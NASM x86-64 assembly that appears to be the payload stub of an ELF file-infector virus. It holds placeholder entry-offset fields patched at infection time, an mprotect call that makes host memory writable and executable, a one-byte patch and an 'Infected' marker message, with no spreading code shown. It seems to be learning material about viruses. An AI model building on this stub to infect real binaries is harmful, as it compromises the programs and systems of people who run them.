BITS 64

SECTION .TEXT
	GLOBAL MAIN
	GLOBAL START

MAIN:
	CALL _START
	NOP
	NOP
	NOP
	NOP
	NOP
	NOP
	NOP
	NOP
	NOP
	RET

_START:
	PUSH RBP
	MOV RBP, RSP
	SUB RSP, 0X10
	PUSH R12
	PUSH RDI
	PUSH RSI
	PUSH RDX

	LEA R12, [REL OFFSET_ENTRY]
	MOV R12, [R12]
	PUSH R12
	MOV R12, [RSP+0x20]
	SUB R12, [RSP]
	MOV RDI, R12
	LEA RSI, [REL SIZE_PTLOAD]
	MOV RSI, [RSI]
	MOV RDX, 0x7 ; PROT_READ | PROT_WRITE | PROT_EXEC
	CALL _PROTECT_PAGE
	MOV BYTE [RDI+0x5], 0xff 

	;RESTORE ORIGIN RIGHTS
	MOV RDX, 0x5
	CALL _PROTECT_PAGE
	
	MOV RDI, 0x1
	LEA RSI, [REL STR]
	MOV RDX, LEN_STR
	MOV RAX, 0x1
	SYSCALL 
	POP RDX
	POP RSI
	POP RDI
	POP R12
	LEAVE
	RET
	OFFSET_ENTRY db 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
	SIZE_PTLOAD db 0xee, 0xee, 0xee, 0xee, 0xee, 0xee, 0xee, 0xee
	STR: db "Infected", 0x0, 0x0a
	LEN_STR: equ $ - STR

; $$$$$$ /* ALLOWS YOU TO CHANGE THE RIGHTS OF A PRIVATE PAGE  */ $$$$$$ ;	;#
; ###    PARAM: RDI: OLD ADRESS  ### ;						;#
; ###    PARAM: RSI: OLD_SIZE    ### ;						;#
; ###    PARAM: RDX: PROT        ### ;						;#
_PROTECT_PAGE:									;#
	PUSH RBP								;#
	MOV RBP, RSP								;#
	SUB RSP, 0x10								;#
	MOV RAX, 10								;#
	SYSCALL									;#
	LEAVE									;#
	RET									;#
